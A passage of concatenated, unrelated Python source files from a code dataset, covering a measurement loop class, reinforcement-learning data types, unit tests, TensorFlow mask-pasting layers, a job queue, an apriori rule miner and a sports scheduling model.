sp_units = self._fill_blank(sp_units, sp_blank)
# now loop through these all, to make the DataArrays
# record which setpoint arrays we've made, so we don't duplicate
all_setpoints = {}
for name, full_name, label, unit, shape, i, sp_vi, sp_ni, sp_li, sp_ui in zip(
names, full_names, labels, units, shapes, action_indices,
sp_vals, sp_names, sp_labels, sp_units):
if shape is None or shape == ():
shape, sp_vi, sp_ni, sp_li, sp_ui= (), (), (), (), ()
else:
sp_blank = (None,) * len(shape)
sp_vi = self._fill_blank(sp_vi, sp_blank)
sp_ni = self._fill_blank(sp_ni, sp_blank)
sp_li = self._fill_blank(sp_li, sp_blank)
sp_ui = self._fill_blank(sp_ui, sp_blank)
setpoints = ()
# loop through dimensions of shape to make the setpoint arrays
for j, (vij, nij, lij, uij) in enumerate(zip(sp_vi, sp_ni, sp_li, sp_ui)):
sp_def = (shape[: 1 + j], j, setpoints, vij, nij, lij, uij)
if sp_def not in all_setpoints:
all_setpoints[sp_def] = self._make_setpoint_array(*sp_def)
out.append(all_setpoints[sp_def])
setpoints = setpoints + (all_setpoints[sp_def],)
# finally, make the output data array with these setpoints
out.append(DataArray(name=name, full_name=full_name, label=label,
shape=shape, action_indices=i, unit=unit,
set_arrays=setpoints, parameter=action))
return out
def _fill_blank(self, inputs, blanks):
if inputs is None:
return blanks
elif len(inputs) == len(blanks):
return inputs
else:
raise ValueError('Wrong number of inputs supplied')
def _make_setpoint_array(self, shape, i, prev_setpoints, vals, name,
label, unit):
if vals is None:
vals = self._default_setpoints(shape)
elif isinstance(vals, DataArray):
# can't simply use the DataArray, even though that's
# what we're going to return here, because it will
# get nested (don't want to alter the original)
# DataArrays do have the advantage though of already including
# name and label, so take these if they exist
if vals.name is not None:
name = vals.name
if vals.label is not None:
label = vals.label
# extract a copy of the numpy array
vals = np.array(vals.ndarray)
else:
# turn any sequence into a (new) numpy array
vals = np.array(vals)
if vals.shape != shape:
raise ValueError('nth setpoint array should have shape matching '
'the first n dimensions of shape.')
if name is None:
name = 'index{}'.format(i)
return DataArray(name=name, label=label, set_arrays=prev_setpoints,
shape=shape, preset_data=vals, unit=unit, is_setpoint=True)
def _default_setpoints(self, shape):
if len(shape) == 1:
return np.arange(0, shape[0], 1)
sp = np.ndarray(shape)
sp_inner = self._default_setpoints(shape[1:])
for i in range(len(sp)):
sp[i] = sp_inner
return sp
def set_common_attrs(self, data_set, use_threads):
"""
set a couple of common attributes that the main and nested loops
all need to have:
- the DataSet collecting all our measurements
- a queue for communicating with the main process
"""
self.data_set = data_set
self.use_threads = use_threads
for action in self.actions:
if hasattr(action, 'set_common_attrs'):
action.set_common_attrs(data_set, use_threads)
def get_data_set(self, *args, **kwargs):
"""
Return the data set for this loop.
If no data set has been created yet, a new one will be created and
returned. Note that all arguments can only be provided when the
`DataSet` is first created; giving these during `run` when
`get_data_set` has already been called on its own is an error.
Args:
data_manager: a DataManager instance (omit to use default,
False to store locally)
kwargs are passed along to data_set.new_data. The key ones are:
Args:
location: the location of the DataSet, a string whose meaning
depends on formatter and io, or False to only keep in memory.
May be a callable to provide automatic locations. If omitted, will
use the default DataSet.location_provider
name: if location is default or another provider function, name is
a string to add to location to make it more readable/meaningful
to users
formatter: knows how to read and write the file format
default can be set in DataSet.default_formatter
io: knows how to connect to the storage (disk vs cloud etc)
write_period: how often to save to storage during the loop.
default 5 sec, use None to write only at the end
returns:
a DataSet object that we can use to plot
"""
if self.data_set is None:
data_set = new_data(arrays=self.containers(), *args, **kwargs)
self.data_set = data_set
else:
has_args = len(kwargs) or len(args)
if has_args:
raise RuntimeError(
'The DataSet for this loop already exists. '
'You can only provide DataSet attributes, such as '
'data_manager, location, name, formatter, io, '
'write_period, when the DataSet is first created.')
return self.data_set
def run_temp(self, **kwargs):
"""
wrapper to run this loop in the foreground as a temporary data set,
especially for use in composite parameters that need to run a Loop
as part of their get method
"""
return self.run(quiet=True, location=False, **kwargs)
def run(self, use_threads=False, quiet=False, station=None,
progress_interval=False, set_active=True, *args, **kwargs):
"""
Execute this loop.
Args:
use_threads: (default False): whenever there are multiple `get` calls
back-to-back, execute them in separate threads so they run in
parallel (as long as they don't block each other)
quiet: (default False): set True to not print anything except errors
station: a Station instance for snapshots (omit to use a previously
provided Station, or the default Station)
progress_interval (int, float): show progress of the loop every x
seconds. If provided here, will override any interval provided
with the Loop definition. Defaults to None
kwargs are passed along to data_set.new_data. These can only be
provided when the `DataSet` is first created; giving these during `run`
when `get_data_set` has already been called on its own is an error.
The key ones are:
Args:
location: the location of the DataSet, a string whose meaning
depends on formatter and io, or False to only keep in memory.
May be a callable to provide automatic locations. If omitted, will
use the default DataSet.location_provider
name: if location is default or another provider function, name is
a string to add to location to make it more readable/meaningful
to users
formatter: knows how to read and write the file format
default can be set in DataSet.default_formatter
io: knows how to connect to the storage (disk vs cloud etc)
write_period: how often to save to storage during the loop.
default 5 sec, use None to write only at the end
returns:
a DataSet object that we can use to plot
"""
if progress_interval is not False:
self.progress_interval = progress_interval
data_set = self.get_data_set(*args, **kwargs)
self.set_common_attrs(data_set=data_set, use_threads=use_threads)
station = station or self.station or Station.default
if station:
data_set.add_metadata({'station': station.snapshot()})
# information about the loop definition is in its snapshot
data_set.add_metadata({'loop': self.snapshot()})
# then add information about how and when it was run
ts = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
data_set.add_metadata({'loop': {
'ts_start': ts,
'use_threads': use_threads,
}})
data_set.save_metadata()
if set_active:
ActiveLoop.active_loop = self
try:
if not quiet:
print(datetime.now().strftime('Started at %Y-%m-%d %H:%M:%S'))
self._run_wrapper()
ds = self.data_set
finally:
if not quiet:
print(repr(self.data_set))
print(datetime.now().strftime('Finished at %Y-%m-%d %H:%M:%S'))
# After normal loop execution we clear the data_set so we can run
# again. But also if something went wrong during the loop execution
# we want to clear the data_set attribute so we don't try to reuse
# this one later.
self.data_set = None
if set_active:
ActiveLoop.active_loop = None
return ds
def _compile_actions(self, actions, action_indices=()):
callables = []
measurement_group = []
for i, action in enumerate(actions):
new_action_indices = action_indices + (i,)
if hasattr(action, 'get'):
measurement_group.append((action, new_action_indices))
continue
elif measurement_group:
callables.append(_Measure(measurement_group, self.data_set,
self.use_threads))
measurement_group[:] = []
callables.append(self._compile_one(action, new_action_indices))
if measurement_group:
callables.append(_Measure(measurement_group, self.data_set,
self.use_threads))
measurement_group[:] = []
return callables
def _compile_one(self, action, new_action_indices):
if isinstance(action, Wait):
return Task(self._wait, action.delay)
elif isinstance(action, ActiveLoop):
return _Nest(action, new_action_indices)
else:
return action
def _run_wrapper(self, *args, **kwargs):
try:
self._run_loop(*args, **kwargs)
finally:
if hasattr(self, 'data_set'):
# TODO (giulioungaretti) WTF?
# somehow this does not show up in the data_set returned by
# run(), but it is saved to the metadata
ts = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
self.data_set.add_metadata({'loop': {'ts_end': ts}})
self.data_set.finalize()
def _run_loop(self, first_delay=0, action_indices=(),
loop_indices=(), current_values=(),
**ignore_kwargs):
"""
the routine that actually executes the loop, and can be called
from one loop to execute a nested loop
first_delay: any delay carried over from an outer loop
action_indices: where we are in any outer loop action arrays
loop_indices: setpoint indices in any outer loops
current_values: setpoint values in any outer loops
signal_queue: queue to communicate with main process directly
ignore_kwargs: for compatibility with other loop tasks
"""
# at the beginning of the loop, the time to wait after setting
# the loop parameter may be increased if an outer loop requested longer
delay = max(self.delay, first_delay)
callables = self._compile_actions(self.actions, action_indices)
n_callables = 0
for item in callables:
if hasattr(item, 'param_ids'):
n_callables += len(item.param_ids)
else:
n_callables += 1
t0 = time.time()
last_task = t0
imax = len(self.sweep_values)
self.last_task_failed = False
for i, value in enumerate(self.sweep_values):
if self.progress_interval is not None:
tprint('loop %s: %d/%d (%.1f [s])' % (
self.sweep_values.name, i, imax, time.time() - t0),
dt=self.progress_interval, tag='outerloop')
if i:
tprint("Estimated finish time: %s" % (
time.asctime(time.localtime(t0 + ((time.time() - t0) * imax / i)))),
dt=self.progress_interval, tag="finish")
set_val = self.sweep_values.set(value)
new_indices = loop_indices + (i,)
new_values = current_values + (value,)
data_to_store = {}
if hasattr(self.sweep_values, "parameters"): # combined parameter
set_name = self.data_set.action_id_map[action_indices]
if hasattr(self.sweep_values, 'aggregate'):
value = self.sweep_values.aggregate(*set_val)
# below is useful but too verbose even at debug
# log.debug('Calling .store method of DataSet because '
# 'sweep_values.parameters exist')
self.data_set.store(new_indices, {set_name: value})
# set_val list of values to set [param1_setpoint, param2_setpoint ..]
for j, val in enumerate(set_val):
set_index = action_indices + (j+n_callables, )
set_name = (self.data_set.action_id_map[set_index])
data_to_store[set_name] = val
else:
set_name = self.data_set.action_id_map[action_indices]
data_to_store[set_name] = value
# below is useful but too verbose even at debug
# log.debug('Calling .store method of DataSet because a sweep step'
# ' was taken')
self.data_set.store(new_indices, data_to_store)
if not self._nest_first:
# only wait the delay time if an inner loop will not inherit it
self._wait(delay)
try:
for f in callables:
# below is useful but too verbose even at debug
# log.debug('Going through callables at this sweep step.'
# ' Calling {}'.format(f))
f(first_delay=delay,
loop_indices=new_indices,
current_values=new_values)
# after the first action, no delay is inherited
delay = 0
except _QcodesBreak:
break
# after the first setpoint, delay reverts to the loop delay
delay = self.delay
# now check for a background task and execute it if it's
# been long enough since the last time
# don't let exceptions in the background task interrupt
# the loop
# if the background task fails twice consecutively, stop
# executing it
if self.bg_task is not None:
t = time.time()
if t - last_task >= self.bg_min_delay:
try:
self.bg_task()
except Exception:
if self.last_task_failed:
self.bg_task = None
self.last_task_failed = True
log.exception("Failed to execute bg task")
last_task = t
# run the background task one last time to catch the last setpoint(s)
if self.bg_task is not None:
log.debug('Running the background task one last time.')
self.bg_task()
# the loop is finished - run the .then actions
#log.debug('Finishing loop, running the .then actions...')
for f in self._compile_actions(self.then_actions, ()):
#log.debug('...running .then action {}'.format(f))
f()
# run the bg_final_task from the bg_task:
if self.bg_final_task is not None:
log.debug('Running the bg_final_task')
self.bg_final_task()
def _wait(self, delay):
if delay:
finish_clock = time.perf_counter() + delay
t = wait_secs(finish_clock)
time.sleep(t)
|
the-stack_0_26000
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
# Please DO NOT import gym in here. We might have installation without gym depending on
# this module for typing
from abc import ABC, abstractmethod
from dataclasses import asdict, dataclass, field, fields
from typing import Any, Callable, Dict, List, Optional, Union
import numpy as np
import reagent.core.types as rlt
import torch
import torch.nn.functional as F
@dataclass
class Transition(rlt.BaseDataClass):
mdp_id: int
sequence_number: int
observation: Any
action: Any
reward: float
terminal: bool
log_prob: Optional[float] = None
possible_actions_mask: Optional[np.ndarray] = None
info: Optional[Dict] = None
# Same as asdict but filters out none values.
def asdict(self):
return {k: v for k, v in asdict(self).items() if v is not None}
def get_optional_fields(cls) -> List[str]:
"""return list of optional annotated fields"""
ret: List[str] = []
for f in fields(cls):
# Check if exactly two arguments exists and one of them are None type
if hasattr(f.type, "__args__") and type(None) in f.type.__args__:
ret.append(f.name)
return ret
@dataclass
class Trajectory(rlt.BaseDataClass):
transitions: List[Transition] = field(default_factory=list)
def __post_init__(self):
self.optional_field_exist: Dict[str, bool] = {
f: False for f in get_optional_fields(Transition)
}
def __len__(self):
return len(self.transitions)
def add_transition(self, transition: Transition):
if len(self) == 0:
# remember which optional fields should be filled
for f in self.optional_field_exist:
val = getattr(transition, f, None)
if val is not None:
self.optional_field_exist[f] = True
# check that later additions also fill the same optional fields
for f, should_exist in self.optional_field_exist.items():
val = getattr(transition, f, None)
if (val is not None) != should_exist:
raise ValueError(
f"Field {f} given val {val} whereas should_exist is {should_exist}."
)
self.transitions.append(transition)
def __getattr__(self, attr: str):
ret = []
for transition in self.transitions:
ret.append(getattr(transition, attr))
return ret
def calculate_cumulative_reward(self, gamma: float = 1.0):
"""Return (discounted) sum of rewards."""
num_transitions = len(self)
assert num_transitions > 0, "called on empty trajectory"
rewards = self.reward
discounts = [gamma ** i for i in range(num_transitions)]
return sum(reward * discount for reward, discount in zip(rewards, discounts))
def to_dict(self):
d = {"action": F.one_hot(torch.from_numpy(np.stack(self.action)), 2)}
for f in [
"observation",
"reward",
"terminal",
"log_prob",
"possible_actions_mask",
]:
if self.optional_field_exist.get(f, True):
f_value = getattr(self, f)
if np.isscalar(f_value[0]):
# scalar values
d[f] = torch.tensor(f_value)
else:
# vector values, need to stack
d[f] = torch.from_numpy(np.stack(f_value)).float()
return d
class Sampler(ABC):
"""Given scores, select the action."""
@abstractmethod
def sample_action(self, scores: Any) -> rlt.ActorOutput:
raise NotImplementedError()
@abstractmethod
def log_prob(self, scores: Any, action: torch.Tensor) -> torch.Tensor:
raise NotImplementedError()
def update(self) -> None:
"""Call to update internal parameters (e.g. decay epsilon)"""
pass
# From preprocessed observation, produce scores for sampler to select action
DiscreteScorer = Callable[[Any, Optional[np.ndarray]], Any]
ContinuousScorer = Callable[[Any], Any]
Scorer = Union[DiscreteScorer, ContinuousScorer]
# Transform ReplayBuffer's transition batch to trainer.train
TrainerPreprocessor = Callable[[Any], Any]
""" Called after env.step(action)
Args: (state, action, reward, terminal, log_prob)
"""
PostStep = Callable[[Transition], None]
""" Called after end of episode
"""
PostEpisode = Callable[[Trajectory], None]
@dataclass
class GaussianSamplerScore(rlt.BaseDataClass):
loc: torch.Tensor
scale_log: torch.Tensor
|
the-stack_0_26001
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import unittest
import shutil
import tempfile
from telemetry.util import file_handle
class FileHandleUnittest(unittest.TestCase):
def setUp(self):
self.temp_file_txt = tempfile.NamedTemporaryFile(
suffix='.txt', delete=False)
self.abs_path_html = tempfile.NamedTemporaryFile(
suffix='.html', delete=False).name
def tearDown(self):
os.remove(self.abs_path_html)
def testCreatingFileHandle(self):
fh1 = file_handle.FromTempFile(self.temp_file_txt)
self.assertEquals(fh1.extension, '.txt')
fh2 = file_handle.FromFilePath(self.abs_path_html)
self.assertEquals(fh2.extension, '.html')
self.assertNotEquals(fh1.id, fh2.id)
def testOutputFiles(self):
fh1 = file_handle.FromTempFile(self.temp_file_txt)
fh2 = file_handle.FromFilePath(self.abs_path_html)
tmpdir = tempfile.mkdtemp()
try:
file_ids_to_paths = file_handle.OutputFiles([fh1, fh2], tmpdir)
expected_output_file_1_path = os.path.join(tmpdir, str(fh1.id) + '.txt')
expected_output_file_2_path = os.path.join(tmpdir, str(fh2.id) + '.html')
self.assertEqual(file_ids_to_paths[fh1.id], expected_output_file_1_path)
self.assertEqual(file_ids_to_paths[fh2.id], expected_output_file_2_path)
# Test that the files are actually output.
self.assertTrue(os.path.exists(expected_output_file_1_path))
self.assertTrue(os.path.exists(expected_output_file_2_path))
finally:
shutil.rmtree(tmpdir)
|
the-stack_0_26002
|
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains definition for bilinear grid sampling and mask pasting layers."""
from typing import List
import tensorflow as tf
class BilinearGridSampler(tf.keras.layers.Layer):
"""Bilinear Grid Sampling layer."""
def __init__(self, align_corners: bool = False, **kwargs):
"""Generates panoptic segmentation masks.
Args:
align_corners: A `bool` bool, if True, the centers of the 4 corner
pixels of the input and output tensors are aligned, preserving the
values at the corner pixels.
**kwargs: Additional kwargs arguments.
"""
super(BilinearGridSampler, self).__init__(**kwargs)
self.align_corners = align_corners
self._config = {
'align_corners': align_corners
}
def build(self, input_shape):
features_shape, _, _ = input_shape
_, height, width, channels = features_shape.as_list()
self._height = height
self._width = width
self._channels = channels
def _valid_coordinates(self, x_coord, y_coord):
return tf.logical_and(
tf.logical_and(
tf.greater_equal(x_coord, 0),
tf.greater_equal(y_coord, 0)),
tf.logical_and(
tf.less(x_coord, self._width),
tf.less(y_coord, self._height)))
def _get_pixel(self, features, x_coord, y_coord):
x_coord = tf.cast(x_coord, dtype=tf.int32)
y_coord = tf.cast(y_coord, dtype=tf.int32)
clipped_x = tf.clip_by_value(x_coord, 0, self._width - 1)
clipped_y = tf.clip_by_value(y_coord, 0, self._height - 1)
batch_size, _, _, _ = features.shape.as_list()
if batch_size is None:
batch_size = tf.shape(features)[0]
batch_indices = tf.reshape(
tf.range(batch_size, dtype=tf.int32),
shape=[batch_size, 1, 1])
batch_indices = tf.tile(
batch_indices,
multiples=[1, x_coord.shape[1], x_coord.shape[2]])
indices = tf.cast(
tf.stack([batch_indices, clipped_y, clipped_x], axis=-1),
dtype=tf.int32)
gathered_pixels = tf.gather_nd(features, indices)
return tf.where(
tf.expand_dims(self._valid_coordinates(x_coord, y_coord), axis=-1),
gathered_pixels,
tf.zeros_like(gathered_pixels))
def call(self, inputs):
features, x_coord, y_coord = inputs
x_coord += 1
y_coord += 1
if self.align_corners:
x_coord = (x_coord * 0.5) * (self._width - 1)
y_coord = (y_coord * 0.5) * (self._height - 1)
else:
x_coord = (x_coord * self._width - 1) * 0.5
y_coord = (y_coord * self._height - 1) * 0.5
left = tf.floor(x_coord)
top = tf.floor(y_coord)
right = left + 1
bottom = top + 1
top_left = (right - x_coord) * (bottom - y_coord)
top_right = (x_coord - left) * (bottom - y_coord)
bottom_left = (right - x_coord) * (y_coord - top)
bottom_right = (x_coord - left) * (y_coord - top)
i_top_left = self._get_pixel(features, left, top)
i_top_right = self._get_pixel(features, right, top)
i_bottom_left = self._get_pixel(features, left, bottom)
i_bottom_right = self._get_pixel(features, right, bottom)
i_top_left *= tf.expand_dims(top_left, axis=-1)
i_top_right *= tf.expand_dims(top_right, axis=-1)
i_bottom_left *= tf.expand_dims(bottom_left, axis=-1)
i_bottom_right *= tf.expand_dims(bottom_right, axis=-1)
interpolated_features = tf.math.add_n(
[i_top_left, i_top_right, i_bottom_left, i_bottom_right])
return interpolated_features
def get_config(self):
return self._config_dict
@classmethod
def from_config(cls, config):
return cls(**config)
class PasteMasks(tf.keras.layers.Layer):
"""Layer to paste instance masks."""
def __init__(self, output_size: List[int],
grid_sampler, **kwargs):
"""Resizes and pastes instance masks to match image size.
Args:
output_size: A `List` of integers that represent the height and width of
the output mask.
grid_sampler: A grid sampling layer. Currently only `BilinearGridSampler`
is supported.
**kwargs: Additional kwargs arguments.
"""
super(PasteMasks, self).__init__(**kwargs)
self._output_size = output_size
self._grid_sampler = grid_sampler
self._config = {
'output_size': output_size,
'grid_sampler': grid_sampler
}
def build(self, input_shape):
self._x_coords = tf.range(0, self._output_size[1], dtype=tf.float32)
self._y_coords = tf.range(0, self._output_size[0], dtype=tf.float32)
def call(self, inputs):
masks, boxes = inputs
y0, x0, y1, x1 = tf.split(boxes, 4, axis=1)
x_coords = tf.cast(self._x_coords, dtype=boxes.dtype)
y_coords = tf.cast(self._y_coords, dtype=boxes.dtype)
x_coords = (x_coords - x0) / (x1 - x0) * 2 - 1
y_coords = (y_coords - y0) / (y1 - y0) * 2 - 1
x_coords = tf.tile(
tf.expand_dims(x_coords, axis=1),
multiples=[1, self._output_size[0], 1])
y_coords = tf.tile(
tf.expand_dims(y_coords, axis=2),
multiples=[1, 1, self._output_size[1]])
pasted_masks = self._grid_sampler((masks, x_coords, y_coords))
return pasted_masks
def get_config(self):
return self._config_dict
@classmethod
def from_config(cls, config):
return cls(**config)
|
the-stack_0_26003
|
"""
This module provides a Job_queue class, and an example of use. One may drop in
either multiprocessing Prcoesses or threading Threads, as I have show in the
test suite.
"""
class Job_Queue(object):
"""
The goal of this class is to make a queue of processes to run, and go
through them running X number at any given time.
So if the bubble is 5 start with 5 running and move the bubble of running
procs along the queue looking something like this:
Start
...........................
[~~~~~]....................
___[~~~~~].................
_________[~~~~~]...........
__________________[~~~~~]..
____________________[~~~~~]
___________________________
End
"""
def __init__(self, max_running):
"""
Setup the class to resonable defaults.
"""
self._queued = []
self._running = []
self._completed = []
self._num_of_jobs = 0
self._max = max_running
self._finished = False
self._closed = False
self._debug = False
def _all_alive(self):
"""
Simply states if all procs are alive or not. Needed to determine when
to stop looping, and pop dead procs off and add live ones.
"""
if self._running:
return all([x.is_alive() for x in self._running])
else:
return False
def __len__(self):
"""
Just going to use number of jobs as the Job_Queue length.
"""
return self._num_of_jobs
def close(self):
"""
A sanity check, so that the need to care about new jobs being added in
the last throws of the job_queue's run are negated.
"""
if self._debug:
print("job queue closed.")
self._closed = True
def append(self, process):
"""
Add the Process() to the queue, so that later it can be checked up on.
That is if the Job_Queue is still open.
If the queue is closed, this will just silently do nothing.
"""
if not self._closed:
self._queued.append(process)
self._num_of_jobs += 1
if self._debug:
print("job queue appended %s." % process.name)
def _advance_the_queue(self):
"""
Helper function to do the job of poping a new proc off the queue
start it, then add it to the running queue. This will eventually
depleate the _queue, which is a condition of stopping the running
while loop.
"""
while len(self._running) < self._max and self._queued:
job = self._queued.pop()
job.start()
self._running.append(job)
def start(self):
"""
This is the workhorse. It will take the intial jobs from the _queue,
start them, add them to _running, and then go into the main running
loop.
This loop will check for done procs, if found, move them out of
_running into _completed. It also checks for a _running queue with open
spots, which it will then fill as discovered.
To end the loop, there have to be no running procs, and no more procs
to be run in the queue.
When all if finished, it will exit the loop, and disconnect_all()
"""
if not self._closed:
raise Exception("Need to close() before starting.")
if self._debug:
print("Job queue starting.")
print("Job queue intial running queue fill.")
self._advance_the_queue()
while not self._finished:
if self._debug:
print("Job queue running queue filling.")
self._advance_the_queue()
if not self._all_alive():
for id, job in enumerate(self._running):
if not job.is_alive():
if self._debug:
print("Job queue found finished proc: %s." %
job.name)
done = self._running.pop(id)
self._completed.append(done)
if self._debug:
print("Job queue has %d running." % len(self._running))
if not (self._queued or self._running):
if self._debug:
print("Job queue finished.")
for job in self._completed:
job.join()
self._finished = True
#### Sample
def try_using(parallel_type):
"""
This will run the queue through it's paces, and show a simple way of using
the job queue.
"""
def print_number(number):
"""
Simple function to give a simple task to execute.
"""
print(number)
if parallel_type == "multiprocessing":
from multiprocessing import Process as Bucket
elif parallel_type == "threading":
from threading import Thread as Bucket
# Make a job_queue with a bubble of len 5, and have it print verbosely
jobs = Job_Queue(2)
jobs._debug = True
# Add 20 procs onto the stack
for x in range(20):
jobs.append(Bucket(
target = print_number,
args = [x],
kwargs = {},
))
# Close up the queue and then start it's execution
jobs.close()
jobs.start()
if __name__ == '__main__':
try_using("multiprocessing")
try_using("threading")
|
the-stack_0_26005
|
# -*- coding: utf-8 -*-
import sys
from py12306.app import *
from py12306.log.common_log import CommonLog
from py12306.query.query import Query
from py12306.user.user import User
from py12306.web.web import Web
def main():
load_argvs()
CommonLog.print_welcome()
App.run()
CommonLog.print_configs()
App.did_start()
App.run_check()
Query.check_before_run()
####### 运行任务
Web.run()
User.run()
Query.run()
if not Const.IS_TEST:
while True:
sleep(10000)
else:
if Config().is_cluster_enabled(): stay_second(5) # 等待接受完通知
CommonLog.print_test_complete()
def test():
"""
功能检查
包含:
账号密码验证 (打码)
座位验证
乘客验证
语音验证码验证
通知验证
:return:
"""
Const.IS_TEST = True
Config.OUT_PUT_LOG_TO_FILE_ENABLED = False
if '--test-notification' in sys.argv or '-n' in sys.argv:
Const.IS_TEST_NOTIFICATION = True
pass
def load_argvs():
if '--test' in sys.argv or '-t' in sys.argv: test()
config_index = None
if '--config' in sys.argv: config_index = sys.argv.index('--config')
if '-c' in sys.argv: config_index = sys.argv.index('-c')
if config_index:
Config.CONFIG_FILE = sys.argv[config_index + 1:config_index + 2].pop()
if __name__ == '__main__':
main()
|
the-stack_0_26009
|
import csv
import itertools
from pandas import DataFrame
class Armin:
def apriori(self, input_filename, output_filename, min_support_percentage, min_confidence):
transactions = {}
# Opens desired csv file
with open(input_filename, 'r') as csv_file:
csv_reader = csv.reader(csv_file)
# Parses each row and creates dictionary where transaction id is the key and values are added as a list
for row in csv_reader:
i = 0
key = -1
values = []
for cell in row:
if i == 0:
key = cell
else:
values.append(cell)
i += 1
transactions[key] = values
# Parsed data is converted into pandas dataframe object
df = DataFrame.from_dict(transactions, orient='index')
# Dataframe is iterated over and occurrences of each value is calculated and stored in dictionary
support_counts = {}
total_transactions = 0
for row in list(df.values):
for value in row:
if value not in support_counts.keys():
if value is not None:
support_counts[value] = 1
else:
support_counts[value] += 1
total_transactions += 1
# Support percentage is created and if support percentage >= min support percentage then it is added to vfi
vfi = {}
for key, value in support_counts.items():
support_percentage = value / total_transactions
if support_percentage >= min_support_percentage:
vfi[key] = (support_percentage, value)
# List contains all possible combinations from 1 to vfi.keys() + 1
new_vfi = {}
for num in range(1, len(vfi.keys()) + 1):
for combination in itertools.combinations(vfi.keys(), num):
if len(combination) == 1:
new_vfi[combination[0]] = vfi[combination[0]][0]
else:
support = calculate_support(combination, df, total_transactions)
if support >= min_support_percentage:
new_vfi[combination] = support
# List contains all possible combinations
combo_list = []
for combo in new_vfi.keys():
combo_list.append(combo)
r_output = []
i = 0
while i < len(combo_list):
j = 0
while j < len(combo_list):
# Makes sure left and right had side do not contain the same element(s)
check = False
for x in combo_list[i]:
for y in combo_list[j]:
if x == y:
check = True
if combo_list[i] != combo_list[j] and not check:
# Creates unique list which stores union of X and Y
union = [combo_list[i]] + [combo_list[j]]
unique = []
for u in union:
if len(u) > 1:
for u2 in u:
unique.append(u2)
else:
unique.append(u)
# Calculates support of X
support_x = calculate_support(combo_list[i], df, total_transactions)
# Calculates support of X U Y
support_y = calculate_support(unique, df, total_transactions)
# Calculates confidence
confidence = support_y / support_x
# Set added to output if confidence and support meet thresholds
if confidence >= min_confidence and support_y >= min_support_percentage:
r_output.append([support_y, confidence, combo_list[i], combo_list[j]])
j += 1
i += 1
# Writes output to target file
with open(output_filename, mode='w') as output_file:
# Output for S rows
for keys, value in new_vfi.items():
key = ""
keys = sorted(keys)
for k in keys:
key += k
key += ','
key = key[:-1]
output_file.write("S,%s,%s\n" % (format(value, '.4f'), key))
# Output for R rows
for data in r_output:
left = ""
for v in data[2]:
left += v
left += ','
left = left[:-1]
right = ""
for v in data[3]:
right += v
right += ','
right = right[:-1]
output_file.write("R,%s,%s,%s,'=>',%s\n" % (format(data[0], '.4f'), format(data[1], '.4f'), left, right))
# Calculates support of given list
def calculate_support(combination, df, total_transactions):
occurrences = 0
for row in list(df.values):
if set(combination).issubset(set(row)):
occurrences += 1
return occurrences / total_transactions
if __name__ == "__main__":
armin = Armin()
armin.apriori('input.csv', 'output.sup=0.5,conf=0.7.csv', 0.5, 0.7)
armin.apriori('input.csv', 'output.sup=0.5,conf=0.8.csv', 0.5, 0.8)
armin.apriori('input.csv', 'output.sup=0.6,conf=0.8.csv', 0.6, 0.8)
|
the-stack_0_26010
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import numpy as np
import mindspore.nn as nn
import mindspore.context as context
from mindspore import Tensor
from mindspore.ops import operations as P
context.set_context(mode=context.GRAPH_MODE, device_target="Ascend")
class Net(nn.Cell):
def __init__(self, sigma=1.0):
super(Net, self).__init__()
self.SmoothL1Loss = P.SmoothL1Loss(sigma)
def construct(self, pred, gt):
return self.SmoothL1Loss(pred, gt)
def test_net():
pred = np.random.randn(2, 4).astype(np.float32)
gt = np.random.randn(2, 4).astype(np.float32)
smooth_l1_loss = Net()
loss = smooth_l1_loss(Tensor(pred), Tensor(gt))
print("------------- input ---------------")
print("predict:\n", pred)
print("grount truth:\n", gt)
print("------------- output ---------------")
print("loss:\n", loss.asnumpy())
|
the-stack_0_26011
|
# Numpy is imported, seed is set
# Starting step
step = 50
dice = 6
# Roll the dice
np.random.randint(1,7)
# Finish the control construct
if dice <= 2 :
step = step - 1
elif dice <=5 :
step = step + 1
else:
step = step + np.random.randint(1,7)
# Print out dice and step
print(dice)
print(step)
|
the-stack_0_26013
|
"""
Problem 026 on CSPLib
Examples of Execution:
python3 SportsScheduling.py
python3 SportsScheduling.py -data=10
python3 SportsScheduling.py -data=10 -variant=dummy
"""
from pycsp3 import *
nTeams = data or 8
nWeeks, nPeriods, nMatches = nTeams - 1, nTeams // 2, (nTeams - 1) * nTeams // 2
def match_number(t1, t2):
return nMatches - ((nTeams - t1) * (nTeams - t1 - 1)) // 2 + (t2 - t1 - 1)
table = {(t1, t2, match_number(t1, t2)) for t1, t2 in combinations(range(nTeams),2)}
# h[w][p] is the home team at week w and period p
h = VarArray(size=[nWeeks, nPeriods], dom=range(nTeams))
# a[w][p] is the away team at week w and period p
a = VarArray(size=[nWeeks, nPeriods], dom=range(nTeams))
# m[w][p] is the number of the match at week w and period p
m = VarArray(size=[nWeeks, nPeriods], dom=range(nMatches))
satisfy(
# linking variables through ternary table constraints
[(h[w][p], a[w][p], m[w][p]) in table for w in range(nWeeks) for p in range(nPeriods)],
# all matches are different (no team can play twice against another team)
AllDifferent(m),
# each week, all teams are different (each team plays each week)
[AllDifferent(h[w] + a[w]) for w in range(nWeeks)],
# each team plays at most two times in each period
[Cardinality(h[:, p] + a[:, p], occurrences={t: range(1, 3) for t in range(nTeams)}) for p in range(nPeriods)],
# tag(symmetry-breaking)
[
# the match '0 versus t' (with t strictly greater than 0) appears at week t-1
[Count(m[w], value=match_number(0, w + 1)) == 1 for w in range(nWeeks)],
